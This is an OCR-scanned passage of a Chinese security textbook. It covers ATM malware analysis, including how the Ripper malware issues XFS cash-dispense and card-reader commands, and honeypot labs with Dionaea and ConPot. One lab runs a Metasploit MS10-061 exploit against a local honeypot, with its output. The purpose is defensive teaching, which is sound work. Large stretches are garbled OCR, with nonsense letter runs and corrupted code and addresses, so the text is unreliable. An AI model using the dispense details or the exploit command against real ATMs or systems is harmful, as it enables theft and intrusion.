* .idataz8842802808 extrn WFSCancelfsyncRequest: dword ; DATA XREF: sub 46F76C+ATr 
* .idata: 08528205 extrn WFSStartUp:dword  ; DATA XREF: sub 46A3E2+DTr 
* .idata- 885282 08 extrn UFSCleanUp:dword  ; DATA AREF: .-text-loc 46A466Tr 
* .idata:8842502 6C 
.idata:88528218 ; 由 xrefs to WFSOpen 
-idata-8B8528218 ; Imp 
.idata:880428218 ; Die... T. Address 
' -ldata: 60428216 ; HINS Up | sub 4091E9+4F | call ds‘\WFSOnpen 
-ldata:6642A216 
.idata:88528218 
* .idata:88042021^5 ; HIHS: 
.idata:885280215h - - 
.idata:80528215 
* .idata:860428218 


-idata:@0427A71C ; 
.idata:8842021C ; ImpOEm 


图 20-9 IDA 中 的 交 又 引用 功能 
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确定 了 对 WEFSOpen 的 调用 后 ， 只 需要 得 看 第 一 个 参数 的 内 容 ， 这 个 字符 串 用 
于 确定 交互 的 外 围 设 备 ( 注 意 ， 这 个 名 称 因 AIM 供 应 商 而 异 )。 图 20-10 显 示 了 
SUCEFUL ATM 恶 意 软件 的 示例 ， 其 中 ， 正 与 两 个 供应 商 的 外 围 读 卡 器 交互 ; 
Diebold( 称 AJDBD ”MotoCardRdr) 和 NCR( 称 为 IDCardUnit])。 


device sear as aDbdMotocardrdr 0 ; "DBD MOTOCARDRDR" 
offset wo Dc 

offset 

offset 


device 409194 
WFSOpen 40C70C 


a offset aldcardunitl ; T CUT 
offset word 40C 
offset 
offset 


device 94 
WFSOpen 40C70C 


图 20-10 不 同 供应 商 的 WFSOpen 调 用 


了 解 到 恶意 软件 正在 尝试 交互 的 外 围 设备 或 逻辑 设备 后 ,现在 查找 执行 的 命令 。 
需要 将 WFSOpen 调 用 与 WFSExecute 调 用 结合 起 来 ， 并 区 别 所 请 求 的 操作 。 ,一 旦 人 确 
定 了 WFSExecute 调 用 ， 就 需要 集中 考虑 第 二 个 参数 ， 这 个 编号 指示 要 执行 的 操作 。 
IH] FF LA Ripper 为 例 。 在 下 面 的 代码 清单 中 ， 调 用 的 第 二 个 参数 是 编号 


302( 见 .text:004090B8 一 行 )， 但 该 数字 目的 何在 ? 
.text:004090B8 push 302 
.text:004090BD push eax 
.Lext:004090BE mov word ptr [ebp-28h], 2020h 
.Ltext:004090C4 mov byte ptr [ebp-260h], 20h 
-text:004090C8 mov [ebp-25h], ecx 
-text:004090CB mov l[ebp-1Bh], ecx 
.text:004090CE mov [ebp-1Fh], edi 
.Ltext:004090D1 call ds:WFSExecute 


为 找到 答案 ， 需 要 准备 好 XFS SDK 的 头 文件 ， 如 图 20-11 所 示 。 


图 20-11 OpenXFS 头 文件 
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每 个 头 都 表示 一 个 外 围 设 备 ， 设 备 范 围 如 下 : 
100- XFSPTR 银行 打印 机 定义 


e 200— XFSIDC ID 卡 单元 定义 

e 300 -XFSCDM ”出 钞 模块 定义 

e 400-XFSPIN ”个 人 识别 号 码 键盘 定义 
e 800-XFSSIU 传 感 融 和 指标 单元 定义 


e 900- XFSVDM ”供应 商 专用 模块 定义 
由 于 相关 编号 是 302， 我 们 看 一 下 SDK 中 的 XFSCDM 文 件 定 义 。 因 为 调用 了 


#208 ATM 亚 意 软件 


WFSExecute( 在 调用 WFSGetInfo 时 ， 使 用 CDM Info Commands 部 分 )， 我 们 重点 研究 
CDM Execute Commands 部 分 。 以 下 公式 用 于 计算 目标 编号 : 


(CDM SERVICE OFFSET = WFS SERVICE CLASS CDM(3)@* 100) + 2 = 302 


我 们 能 识 


#define 
#define 
#define 


#define 


WFS SERVICE CLASS CDM 


WFS SERVICE CLASS VERSION CDM 
WFS SERVICE CLASS NAME CDM 


别 出 相关 的 302 命 令 WFS CMD CDM DISPENSE@ ， 用 于 出 钞 。 


(3)© 
0x0003 
"CDM" 


CDM SERVICE OFFSET (WES SERVICE CLASS CDM * 100) e 


/* CDM Info Commands */ 


#define 
#define 
#define 
#define 
#define 
#define 
#define 
#define 


WFS INF CDM STATUS 
WFS INF CDM CAPABILITIES 
WFS INF CDM CASH UNIT INFO 
WFS INF CDM TELLER INFO 
WFS INF CDM CURRENCY EXP 
WFS INF CDM MIX TYPES 

WFS INF CDM MIX TABLE 

WFS INF CDM PRESENT STATUS 


/* CDM Execute Commands */ 


idefine 
idefine 


#define 
#define 
#define 
#define 
#define 
#define 
#define 
#define 
#define 
#define 


WFS CMD CDM DENOMINATE 
WFS CMD CDM DISPENSE 


WFS CMD CDM PRESENT 
WFS CMD CDM REJECT 

WES CMD CDM RETRACT 

WFS CMD CDM OPEN SHUTTER 
WFS CMD CDM CLOSE SHUTTER 


WFS CMD CDM SET TELLER INFO 
WFS CMD CDM SET CASH UNIT INFO 


WFS CMD CDM START EXCHANGE 
WFS CMD CDM END EXCHANGE 
WES CMD CDM OPEN SAFE DOOR 


(CDM SERVICE OFFSET + 1) 
(CDM SERVICE OFFSET + 2) 
(CDM SERVICE OFFSET + 3) 
(CDM SERVICE OFFSET 十 4) 
(CDM SERVICE OFFSET + 6) 
(CDM SERVICE OFFSET + 7) 
(CDM SERVICE OFFSET + 8) 
(CDM SERVICE OFFSET + 9) 


(CDM SERVICE OFFSET + 1) 
(CDM SERVICE OFFSET + 2)@ 


(CDM SERVICE OFFSET + 3) 
(CDM SERVICE OFFSET + 4) 
(CDM SERVICE OFFSET + 5) 
(CDM SERVICE OFFSET + 7) 
(CDM SERVICE OFFSET + 8) 
(CDM SERVICE OFFSET + 9) 
(CDM SERVICE OFFSET - 10) 
(CDM SERVICE OFFSET + 11) 
(CDM SERVICE OFFSET + 12) 
(CDM SERVICE OFFSET + 13) 
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/* CDM Messages */ 


#define WFS SRVE CDM SAFEDOOROPEN (CDM SERVICE OFFSET + 1) 
#define WFS SRVE CDM SAFEDOORCLOSED (CDM SERVICE OFFSET + 2) 
#define WFS USRE CDM CASHUNITTHRESHOLD (CDM SERVICE OFFSET + 3) 
#define WFS SRVE CDM CASHUNITINFOCHANGED (CDM SERVICE OFFSET + 4) 
#define WFS SRVE CDM TELLERINFOCHANGED (CDM SERVICE OFFSET + 5) 


/* WOSA/XFS CDM Errors */ 


#define WFS ERR CDM INVALIDCURRENCY (-(CDM SERVICE OFFSET + 0) ) 
#define WFS ERR CDM INVALIDTELLERID (-(CDM SERVICE OFFSET + 1)) 
#define WFS ERR CDM CASHUNITERROR (-(CDM SERVICE OFFSET + 2)) 
#define WFS ERR CDM INVALIDDENOMINATION (-(CDM SERVICE OFFSET + 3)) 
#define WFS ERR CDM INVALIDMIXNUMBER (-(CDM SERVICE OFFSET + 4)) 
#define WFS ERR CDM NOCURRENCYMIX (- (CDM SERVICE OFFSET + 5)) 


typedef struct wfs cdm cashunit{@ 
{ 


USHORT usNumber; 

USHORT usType; 

LPSTR lpszCashUnitName; 
CHAR cUnitID[5]1; 

CHAR cCurrency!ID[3]; 
ULONG ulValues; 

ULONG ulInitialCount; 
ULONG ulCount; 

ULONG ulRejectCount; 
ULONG ulMinimum; 

ULONG ulMaximum; 

BOOL bAppLock; 

USHORT usStatus; 

USHORT usNumPhysicalCUs; 


LPWFSCDMPHCU *lppPhysical; 
} WFSCDMCASHUNIT, * LPWFSCDMCASHUNIT; 


在 这 些 定义 文件 中 ， 还 有 一 个 有 用 的 信息 可 帮助 分 析 人 员 完 全 理解 恶意 软件 的 
ae, UAE. fr, Bea Me. 
现在 ， 我 们 能 剖析 在 下 面 的 代码 请 间 ( 摘 目 Ripper 亚 意 软件 ) 中 执行 的 命令 : 


.Lext:004025 7B push ebx 
.Ltext:0040257C push ebx 
.text:0040257D push 2018 

-text: 00402582 push eax 

.text :00402083 mov [ebp-4Ch], ebx 
.Ltext:00402580 call ds:WFSGetInfo 


可 以 看 到 ， 命 令 201@ 属 于 XFSIDC 定 义 文件 ( 见 图 20-11)。 由 于 调用 的 是 
WFSGetInfo， 此 时 我 们 专注 于 IDC Info Commands 部 分 ， 发 现 正 在 调用 的 是 
WES INF IDC STATUS £54 9, Aij XX Erf, rd East AS ! 
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#define WFS SERVICE CLASS IDC (2) 
#define WFS SERVICE CLASS NAME IDC "IpO" 
#define WFS SERVICE CLASS VERSION IDC 0x0203 
#define IDC SERVICE OFFSET 


(WES SERVICE CLASS IDC * 100) 


/* IDC Info Commands */ 


3— RTE 


#define WFS INF IDC STATUS (IDC SERVICE OFFSET + 1)® 
#define WFS INF IDC CAPABILITIES (IDC SERVICE OFFSET + 2) 
#define WFS INF IDC FORM LIST (IDC SERVICE OFFSET + 3) 
#define WFS INF IDC QUERY FORM (IDC SERVICE OFFSET + 4) 


/* IDC Execute Commands */ 


#define WFS CMD IDC READ TRACK (IDC SERVICE OFFSET + 1) 
#define WFS CMD IDC WRITE TRACK (IDC SERVICE OFFSET + 2) 
#define WFS CMD IDC EJECT CARD (IDC SERVICE OFFSET + 3) 
#define WFS CMD IDC RETAIN CARD (IDC SERVICE OFFSET + 4) 


Ploutus 之 类 的 恶意 软件 专门 用 来 控制 XFS 中 间 件 (Agilis、APTRA 和 Kalignite 等 )。 


对 于 这 类 恶意 软件 该 方法 不 可 行 。 弟 运 的 是 ，Ploutus 像 是 NET。 因 此 ， 


一 旦 对 该 亚 


意 软 件 进行 反 混 消 处 理 ， 融 可 以 使 用 可 供 分 析 的 完整 源 代 但 ， 而 不 需要 逆 癌 处 理 大 


多 数组 件 (不 过 ， 有 些 组 件 是 在 Delphi 中 实现 的 ， 需 要 道 向 处 理 )。 
20.34 ”针对 ATM 亚 意 软 件 的 对 策 


下 面 是 处 理 AITM 恶 意 软件 时 强烈 推荐 的 最 佳 实 践 ;， 不 过 ， 在 有 些 攻击 场景 中 ， 


这 些 实 践 不 适用 。 


e 及 病毒 或 HIPS(Host Intrusion Prevention System， 主 机 人 入侵 防御 系统 ) 仅 仅 
对 于 ATM 环 境 才 有 意义 。 例如， 这 些 产 品 通 第 无 法 检测 出 钞 模块 中 的 恶意 


行为 。 


e 如 采 离 线 攻 击 是 通过 断 开 存储 设备 与 ATM 的 连接 ， 将 恶意 软件 传输 到 ATM 


实现 的 ， 则 磁盘 加 密 有 助 于 抵御 攻击 。 

应 用 程序 日 名 单 对 于 仅 执行 所 需 的 进程 有 帮助 。 
渗透 测试 有 助 于 先 于 黑客 主动 发 现 问题 。 

应 当 启 用 具有 密码 保护 的 BIOS。 
ATM 恶 意 软 件 培 训 有 助 于 员工 理 角 


年 如 何 检测 和 齐 析 特定 威胁 。 


革 的 “扩展 阅读 ”以 了 解 更 多 细 市 。 


应 当 旭 循 “ATM 软 件 安全 最 住 实践 指 附 ”和 “ATM 安 全 指责 ”。 可 参阅 本 
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WEHA f ATMAJA HHF AREA 2B TEE D BE PH REI PR C. 4128 SY 
io EE ATMIA TRIALS PAS iT CCNA LAE E S RS BU ES: 
致 全 球 银行 数 亿美 元 现金 被 锣 ， 本 章 最 后 讲述 缓解 这 种 威胁 的 对 宋 。 


本 章 基 于 防御 目的 讲述 欺骗"。 衣 乞 讲 述 历史 上 在 战争 冲突 中 使 用 的 欺骗 手段 ， 
然后 讲述 如 何 使 用 密 欣 通过 欺骗 方 式 保护 信息 系统 。 本 章 将 提供 很 多 实例 ， 展 示 其 


AK ES AYE RAN T: 

e sn] 5c 

。 CEXÉGRUE SR IO 
。 FIRN 

e 商品 化 的 密 缸 产品 


21.1 HAUS) Sc. 


“欺骗 ”与 “冲突 ”的 历史 同样 悠 入。 事实 上 ， 大 约 公 元 前 500 年 ,;《 和 孙子 兵 法 》 
中 吏 与 道 :“ 兵 者 ， 说 道 也 。” 一 个 赦 名 的 例子 是 第 二 次 世界 大 战 期 间 的 霸王 行动 
(Operation Bodyguard, SKINS), Bie HB. AI RMS 
车 认为 攻击 来 日 男 一 个 方 回 。 嚼 军 伪造 了 几 个 机 场 ， 一 个 由 好 莱 坞 建设 者 组 成 的 小 
型 团队 制作 了 充气 坦克 、 飞 机 和 建筑 物 。 所 有 这 些 都 成 功 欺 骗 了 当时 的 德军 统帅 ， 
诱 使 德 车 于 盟 车 进攻 开始 日 (D-Day) 在 错误 的 方 回 保留 了 部 分 部 队 。 

从 使 用 欺骗 手段 保护 信息 系统 这 一 点 来 看 ， 很 多 人 认为 Fred Cohenzé KEXAK 
欺骗 方法 及 其 衍生 概念 的 鼻祖 。Cohen 也 是 第 一 个 对 外 发 布 “ 计 算 机 病毒 ”这 一 术 
语 的 人 ; 在 1984 年 ， 他 引用 了 Len Adleman 有 的 话 (Len Adleman 是 这 个 术语 的 最 初 提出 
者 ), 对 外 发 布 了 这 个 术语 。1998 年 4 月 , Cohenf£5 f “A Note on the Role of Deception 
in Information Protection”( 欺 骗 在 信息 保护 中 的 角色 ) 这 一 开创 性 作品 。 虽 然 Cohen 
将 荣誉 给 了 Bill Cheswick 和 AT&T 的 研究 者 们 ， 但 实际 上 是 Cohen 及 其 助手 创建 了 

“Win LEJ” (Deception Toolkit)， 而 这 个 工具 箱 是 第 一 个 真正 意义 上 的 蜜 饮 。 

如 果 Fred Cohen EX Jg ER die dx ANI) 4H. Alb’ Lance Spitzner 就 是 该 领域 之 父 。 
1999 年 ，Spitzner 在 家 里 空 着 的 一 间 卧 室 里 工作 ， 当 时 屋 里 空空 如 也 ， 几 乎 只 有 一 人 台 
连接 到 Intermet 的 计算 机 ， 就 在 这 样 简陋 的 环境 下 ，Spitzner 主 持 成 立 f honeynet.org 
组 ， 并 激发 起 一 代 技 术 人 员 的 热情 ， 时 至 今日 ， 也 仍然 影响 和 推动 着 欺骗 技术 的 发 
展 。honeynet.org 组 定义 和 构建 了 许多 级 别 和 类 型 的 蜜 钦 ， 其 中 很 多 都 是 当今 蜜 色 的 


第 V 部 分 “高 级 恶意 软件 分 析 
先 诗 。 我 们 站 在 这 些 巨 人 的 屑 膀 上 ， 继 续 回 灰 帽 黑客 们 呈现 一 些 最 新 技术 。 


21.1.1 作为 欺骗 形式 的 密 钒 


“ 密 能 ”可 以 简单 地 定义 为 一 个 吸引 攻击 并 对 攻击 活动 产生 警报 的 系统 ， 除 此 
之 外 这 个 系统 没有 其 他 目的 。 如 前 所 述 ， 将 蜜 钙 用 于 其 驹 已 有 多 年 的 历史 。 早 期 蜜 
钦 拉 术 的 一 个 问题 在 于 其 无 法 扩展 。 密 钦 拉 术 通 第 需要 由 一 位 经 验 丰 是 的 安全 专家 
部 着 和 监视 ， 在 荣 些 环境 中 ， 即 使 只 监视 少量 几 个 密 能 也 需要 一 名 全 职 人 员 。 在 当 
今 的 公司 环境 中 ， 较 旧 的 蜜 缸 技术 需要 投入 的 人 力 资 源 过 多 ， 因 而 难以 有 效 部 署 。 
现在 一 些 旧 拉 术 却 重 焕 生 机 ! 随 看 强大 的 虚拟 技术 、Docker 之 类 的 容 右 拉 术 以 及 
Flasticsearch、Logstash 和 和 Kibana(ELK) 栈 之 类 的 分 析 工 具 的 发 展 ， 过 去 ， 那 些 需 要 安 
排 全 职 人 员 进 行 监视 的 搁 术 是 全 公司 面临 的 挑战 ， 如 今 ， 却 成 为 公司 网 络 防 御 的 室 
贯 资 产 ， 组 织 可 以 安排 人 员 兼 职 官 理 这 些 技术 。 如 本 章 后 面 所 述 ， 现 代 蜜 饶 应 当 吻 
于 规模 化 部 区 和 省 理 。 甚 至 行业 分 析 是 也 指出 ， 应 该 部 着 现代 欺骗 技术 ， 对 其 他 的 
企业 安全 技术 形成 有 力 补 序 。 密 饶 拉 术 不 会 取代 其 他 技术 , 但 一 旦 进攻 者 进入 网 络 ， 
密 饶 将 成 为 抓 住 他 们 的 最 好 办 法 。 

将 宝 饶 作为 一 种 欺骗 形式 进行 部 区 的 主要 目的 是 延 运 、 打 断 或 干扰 攻击 者 ， 以 
便 发 现 和 阻止 他 们 。 密 秘技 术 的 关键 特性 是 低 误 报 (Low False-Positive)。 根 据 我 们 的 
定义 ， 只 有 攻击 者 才能 接触 到 蜜 挫 。 因 此 ， 当 一 个 连接 指 同 蜜 馈 时 ， 可 能 是 服务 右 
配置 有 误 需 要 引起 注意 ， 也 可 能 是 一 个 好 奇 的 用 户 (同样 需要 引起 警惕 )， 还 可 能 是 
攻击 者 来 襟 。 没 有 其 他 选项 ， 因 此 ， 蜜 乌拉 术 大 概 是 接触 到 的 误 报 率 最 低 的 技术 。 
在 当今 的 高 误 报 环境 中 ， 这 样 的 低 误 报 或 无 误 报 技术 值得 垂 育 。 

我 们 将 蜜 缸 技术 分 为 如 下 关 型 ， 

e (uA HE 
(IKE S HL CE 
H BEASH NEUE 
AE UE 2 J Yi 
ACE VS LH 


1. MEARE Re 


i BEA HOSCE Fs ee AE ADD BCFA SCHO S DUREE s SEAS A 
SE EH Pe) EP er FY Bez DUREE" IRE JP3E ZO EP LITER BE TE PW 2% A EG 
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拟 环境 中 运行 的 模拟 服务 ， 服 务 模拟 现实 中 的 啊 应 ， 但 系统 的 模拟 能 力 是 有 限 的 。 
例如 ， 可 以 使 用 Python 或 另 一 种 脚本 语言 模拟 Telnet 的 命令 ， 但 有 些 命 令 未 必 工 作 。 
例如 ， 如 果 攻 击 者 尝试 使 用 wget 下 载 文 件 ， 此 时 ， 命 令 看 上 去 在 工作 ， 但 却 未 将 文 
件 提 供给 恶意 攻击 者 ， 而 是 将 信息 提供 给 防御 者 进一步 加 以 分 析 。 还 有 其 他 一 些 实 
际 限制 , 导致 不 能 模拟 Telnet 的 所 有 命令 。 因此, 如 果 攻 击 者 疾 试 使 用 其 中 一 个 命令 ， 
并 以 失败 告终 ， 就 会 发 现 其 中 有 诈 。 稍 后 将 介绍 一 些 流 行 的 低 度 交互 蜜 缸 。 


3. rA B Siz 


TE BU PARS E EAT JH RII HH BEA H.E, RE PT TRE ERR A EZ 
HF EAE HS EE [L5 EBT AE s ARERR TE ARSE, UWISMBPWARDMAG fix 攻击 者 
对 看 似 存 在 漏洞 的 服务 发 动 真 正 的 进攻 ， 有 些 情况 下 攻击 会 返回 shell。 低 度 交 互 蜜 
肉 面 对 这 些 攻击 类 型 通 钊 会 失败 ， 相 比 而 言 中 度 交 互 蜜 乓 有 了 长 足 进步 。 有 些 中 度 
交互 蜜 褒 实际 上 古代 理 ， 将 命令 转 友 给 真实 的 操作 系统 以 达到 欺 驴 目 的 。 男 一 种 中 
PEACH Ri ee 22 FEARS (Canary Service)， 在 生产 系统 中 运行 ， 上 自在 回 防御 者 发 出 
攻击 警示 。 


4. VERE Pm 


SE E P) XE AE AY 73 — IHlo BE Oe PRS IBS, BCR E DU 
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PE Ute VS VA EEA PP it ARS i RA ZN TSN GR. BETS FB — Pris 
见 形式 是 一 个 包含 伪造 数据 的 文件 ， 用 来 吸引 恶意 攻击 者 。 当 和 恶意 攻击 者 使 用 这 个 
LIFE, SFIS. PIO, (te ASP, APRA se PA 
个 passwords.txt 文 件 。 该 文件 中 包含 伪造 的 用 户 名 和 密码。 不 知情 的 攻击 者 想 要 使 用 
这 些 账户 时 ， 企 业 的 安全 信息 事件 管理 (Security Information Event Management, 
SIEM) A ZU. ze ERR. XS AUI HT. canarytokens.orgzé — Tl ^E JV PER Es 2i di V5 


ERREARI kx. 73 A tELinuxMBirBp ap, up UTE E VS TH OS T0629 2T Jis 
项 目 是 honeybits。 


1 详 者 注 : 17 世 纪 ， 英 国政 并 工人 及 现 ， 金 丝 人 种 对 瓦斯 这 种 气体 十 分 敏感 。 衬 气 中 哪 介 有 极 
其 微量 的 瓦斯 金 丝 省 也 会 停止 歌唱 ;而 当 瓦 斯 售 量 超过 一 定 限 度 时 ， 虽 然 人 类 坚 无 察觉 ， 金 丝 
溃 却 早已 毒 发 身 亡 。 当 时 在 采 丰 设备 相对 简陋 的 条 件 下 ， 工 人 们 每 次 下 井 都 会 市 上 一 只 金 丝 省 作 
AY“ ELE WEE, DAE TE EBT PR BLAS o 
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21.1.2 部署 时 的 考虑 事项 


EA EIN, MSS SAR. AG, AVS ee, WIRA E 
IM5| 7. WAFER RE ETE AIBA, MMM GTA]. Hoe, MRS 
Te ACE ZA ZA IE EIST EE, ANSE RIA. TIE EJ, ERKE 
AER. ri Ye BS] ANZ Peg BS Pe aE DAD. MARIE RE SAE PAR SF RE 
BE. ET ee BE PIN IC, fuu. QR E RE JLinux 2E. 
束 不 要 运行 Windows 服 务 ， 反 之 亦 然 。 男 外 ， 如 果 恶 意 攻 击 者 获取 系统 的 访问 权 ， 
不 妨 给 他 们 一 些 “ 真 抽 ”( 形 式 上 豚 似 上 真实， 用 以 迷惑 恶意 攻击 者 )， 如 和 蜜 铭 诱饵 ， 
或 其 他 实用 的 用 户 级 文档 和 配置 。 

其 次 ， 在 哪里 放置 蜜 钢 也 起 着 决定 作用 。 在 考虑 连接 到 Intemet 的 蜜 钠 时 ， 应 当 
想 一 下 是 否 真 的 要 将 监控 与 数据 采集 (Supervisory Control And Data Acquisition, 
SCADA) 服 务 放 在 Amazon AWS IP 空 间 。 在 考虑 一 个 内 部 蜜 钠 时 ， 配 置 和 运行 的 服 
务 应 当 与 布置 密 炙 的 环境 融 为 一 体 。 如 果 除了 一 台 主 机 外 ， 整 个 企业 都 在 运行 
Windows， 攻 击 者 会 怎么 想 呢 ?” 另 外， 如果 有 用 户 VLAN 和 服务 器 VLAN， 那 么 包含 
很 少 服务 ( 或 不 包含 服务 ) 的 基于 主机 的 密 艇 应 当 位 于 用 户 VLAN, 而 包含 很 多 真实 服 
务 的 服务 磺 类 型 的 配置 应 当 位 于 服务 磺 VLAN。 

不 过 ， 对 于 安全 研究 人 员 而 言 ， 还 可 能 出 现 另 一 种 情形 。 在 非 生产 环 境 中 使 用 
窜 缸 进行 研究 时 ， 可 能 会 慷慨 地 扩展 网 络 ， 组 成 蜜 网 Ioneyneb 。 通 过 在 云 妆 运 行 
一 个 系统 ， 同 时 打开 多 个 端口 (在 这 里 ， 靖 口 可 能 晕 无 意义 )， 当 然 可 以 阻止 一 个 老 
练 的 攻击 者 ， 但 最 新 的 蠕虫 变 体 十 分 乐意 连接 进来 ， 并 页 献 二 进 制 样品 供 测 试 人 员 
分 析 ; 这 些 能 力 都 取决 于 最 初 建立 蜜 峻 的 目的 。 


21.1.3. 设置 虚拟 机 


组 织 可 能 诀 定 在 实际 的 完整 操作 系统 上 安装 密 乓 ， 并 和 布 望 得 到 虚拟 机 提供 的 保 
护 ， 相 关 的 保护 功能 有 快照 、 与 主机 完全 隅 离 ， 并 有 虚拟 网 络 设置 。 本 章 为 了 使 用 
Docker， 在 虚拟 机 中 运行 的 是 64 位 Kali Linux 2017.1。 组 织 也 可 以 在 Amazon AWS, 
Digital Ocean kM z-F &. bie fr E Ui e 


o RE: 可 参阅 “扩展 阅读 ”以 了 解 如 何在 Amazon AWS 上 设置 Ubuntu 16.04, 
\3 旦 用 户 必 须 注 意 : 不 要 违反 Amazon 或 其 他 托管 服务 的 任何 用 户 协 定 。 特此 
提醒 ! 
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21.2 FZE 


21.2.1 实验 21-1: Dionaea 
ASL ISS WT FEDionaea. Dionaeazé -HR eZ RE, n] HH PRU PRS. 


注意 : 因为 Docker 不 支持 32 位 操作 系统 ， 本 章 中 的 实验 需要 64 位 Linux。 
为 按 步 又 完成 这 些 练习 ， 建 议 像 我 们 一 样 使 用 64 位 Kali Linux 2017.1. 


首先 ， 设 置 一 个 文件 兴 ， 以 便 从 Docker 获 取 文 件 : 


root@kali:~# mkdir data 


下 载 并 运行 Dionaea Docker 镜 像 : 


docker run -it -p 21:21 -p 42:42 -p 69:69/udp -p80:80 -p 135:135 -p 
443:443 -p 445:445 -p 1433:1433 -p 1723:1723 -p 1883:1883 -p 
1900:1900/udp -p 3306:3306 -p 5060:5060 -p 5060:5060/udp -p 5061:5061 
-p 11211:11211 -v `pwd`/data:/data dinotools/dionaea-docker:latest 
/bin/bash 


XA ae rshell fit —2E E, HFH Sic: 


[container hash id]# sed -i 's/#default./default./' 
/opt/dionaea/etc/dionaea/dionaea.cfg 


ZA, TEdionaea.cfg CFF AA tA BR: 
# cat <<EOF>> /opt/dionaea/etc/dionaea/dionaea.cfg 


[processor.filter streamdumper] 

name=filter 

config.allow.0.types=accept 
config.allow.1.types=connect 
config.allow.1.protocols=ftpctrl 
config.deny.0.protocols=ftpdata, ftpdatacon, xmppclient 
next=streamdumper 


[processor.streamdumper | 

name=streamdumper 
config.path-/opt/dionaea/var/dionaea/bistreams/$Y-$m-$d/ 
EOF 


BUE Hl ABER SS: 
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# sed -i 
's/processors-filter emu/processors-filter emu,filter streamdumpr/' 
/opt/dionaea/etc/dionaea/dionaea.cfg 


BUE JG RE: 


# /opt/dionaea/bin/dionaea -u dionaea -g dionaea -c 
/opt/dionaea/etc/dionaea/dionaea.cfg 


打开 与 Kali 的 另 一 个 终端 会 话 窗口 ， 在 新 shell 中 ， 使 用 Metasploit 攻 击 蜜 饶 : 


root@kali:~/dionaea# msfconsole -x "use 
exploit/windows/smb/ms10 061 spoolss; set PNAME HPPrinter; set 
RHOST 127.0.0.1; set LHOST 127.0.0.1; set LPORT 4444; exploit; 


exit" 

T 人 ee 2 a 

[IN J | T m EFEMEESLT 

| / |. X1 £F LII T dH | 

| | OE | gd. TI ZZ7N. NA | | | ee A 
IM po VAN /VV | |\V\ \ 


Trouble managing data? List, sort, group, tag and search your 
pentest data 
in Metasploit Pro -- learn more on http://rapid7.com/metasploit 


=[ metasploit v4.14.10-dev 


] 
+ -- --=[ 1639 exploits - 944 auxiliary - 289 post l 
+ -- --=[ 472 payloads - 40 encoders - 9 nops ] 
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 


PNAME => HPPrinter 

RHOST => 127.0.0.1 

LHOST => 127.0.0.1 

LPORT => 4444 

[!] You are binding to a loopback address by setting LHOST to 
127.0.0.1. Did you want ReverseListenerBindAddress? 
[*] Started reverse TCP handler on 127.0.0.1:4444 

[*] 127.0.0.1:445 - Trying target Windows Universal... 
[*] 127.0.0.1:445 — Binding to 12345678-1234-abcd-EF00 
0123456789ab:1.08ncacn np:127.0.0.1[Nspoolss] E 

[*] 127.0.0.1:445 - Bound to 12345678-1234-abcd-EF00 
0123456789ab:1.0@ncacn np:127.0.0.1[\spoolss] 2x 

[*] 127.0.0.1:445 - Attempting to exploit MS10-061 via 
\\127.0.0.1\HPPrinter ... 

[*] 127.0.0.1:445 - Printer handle: 
0000000000000000000000000000000000000000 

[*] 127.0.0.1:445 - Job started: 0x3 

[*] 127.0.0.1:445 - Wrote 7/3802 bytes to 
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$SystemRoot$Xsystem32NVKurZGLb7Kudrj.exe 

[*] 127.0.0.1:445 - Job started: 0x3 

[*] 127.0.0.1:445 - Wrote 2241 bytes to 
$SystemRoot$NXsystem32NwbemNmof NRN21znSEgz7TOS.mof 

[-] 127.0.0.1:445 - Exploit failed: NoMethodError undefined 
method “unpack' for nil:NilClass 

[*] Exploit completed, but no session was created. 


注意 ， 使 用 Metasploit 的 攻击 失败 了 。 但 这 是 符合 预期 的 ， 因 为 正在 运行 的 是 一 
个 低 度 交 互 密 缸 。 传 输 和 捕获 载荷 才 是 本 次 实验 的 要 点 。 

现在 ， 从 第 二 个 Kali shell, f2HIFTPXEBESUSCE. Wl RATAN. WRA Kali, 
首先 需要 安装 FTP。 


root@kali:~/dionaea# apt-get install ftp 
Reading package lists... Done 


Building dependency tree 


Reading state information... Done 
The following NEW packages will be installed: 
ftp 
0 upgraded, 1 newly installed, 0 to remove and 1220 not upgraded. 
Need to get 58.7 kB of archives. 
After this operation, 135 kB of additional disk space will be used. 


«truncated for brevity> 


root@kali:~# ftp 127.0.0.1 
Connected to 127.0.0.1. 

220 DiskStation FTP server ready. 
Name (127.0.0.1:root): foo 

331 Password required for foo. 
Password: 

230 User logged in, proceed 

Remote system type is UNIX. 

Using binary mode to transfer files. 
ftp» help 


Commands may be abbreviated. Commands are: 


! dir mdelete qc site 

$ disconnect mdir sendport size 
account exit mget put status 
append form mkdir pwd struct 
ascii get mls quit system 
bell glob mode quote sunique 
binary hash modtime recv tenex 
bye help mput reget tick 
case idle newer rstatus trace 
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Cd image nmap rhelp type 
cdup ipany nlst rename user 
chmod ipv4 ntrans reset umask 
close ipv6 open restart verbose 
CI Log prompt rmdir = 
delete ls passive runique 

debug macdef proxy send 

ftp» bye 


root@kali:~# 


MEA — PARIS. TE shell Eiz PCtri-C2H E, FILE, AREA 
到 如 下 日 志 记 录 : 


# more /opt/dionaea/var/dionaea/dionaea.log 
可 在 以 下 位 置 找到 二 进 制 代码 : 
# ls /opt/dionaea/var/dionaea/binaries/ 


可 在 以 下 位 置 找到 会 话 数据 流 : 


# ls /opt/dionaea/var/dionaea/bistreams/ 


注意 : d d XHAEIEDocker'?iz4T, FHARIHARARG, Ah, wR 
要 在 以 后 进一步 检查 文件 ， 需 要 将 其 转移 到 组 织 设置 的 一 个 共享 文件 夹 
中 。 在 Docker 容 器 中 ， 使 用 tar 将 文件 复制 到 /data 文 件 夹 ， 并 映射 到 Kali 
上 的 工作 目录 ， 如 下 所 示 : 


# tar -cvf /data/dionaea.tar /opt/dionaea/var/dionaea/ 


21.2.2 实验 21-2: ConPot 


本 实验 研究 ConPot 蜜 钢 ， 这 个 蜜 铅 模拟 ICS/SCADA 设 备 。 

另外 ， 单 独 生 成 一 个 目录 ， 用 于 保存 日 志 ( 男 一 种 剃 见 用 法 ): 
root@kali:~# mkdir -p var/log/conpot 

INTE, IWA ConPot tA hE: 

root@kali:~# docker run -it -p 80:80 -p 102:102 -p 502:502 -p 
161:161/udp -v $ (pwd) /var/log/conpot:/var/log/conpot 


--network-bridge honeynet/conpot:latest 


从 为 一 个 Linux 或 Mac shell 上， 和 针对 主机 运行 snmpwalk: 


$ snmpwalk -c public 192.168.80.231 
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SNMPv2-MIB::sysDescr.0 = STRING: Siemens, SIMATIC, S7-200 
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.20408 
